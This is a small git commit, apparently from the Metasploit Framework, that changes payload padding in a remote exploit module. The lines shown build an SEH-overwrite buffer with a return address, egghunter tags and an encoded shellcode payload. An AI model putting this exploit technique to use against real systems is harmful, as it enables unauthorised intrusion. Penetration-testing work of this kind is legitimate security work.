Added more payload padding

bug/bundler_fix
Nathan Einwechter 2013-08-12 11:10:10 -04:00
parent a35d548979
commit 7854c452d2
1 changed files with 1 additions and 1 deletions

View File

@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
buf << [target.ret].pack("V*") # seh
# Setup payload
shellcode = rand_text(1) # align payload
shellcode = rand_text(50) # pad payload
shellcode = egg + egg # attach egg tags
shellcode << payload.encoded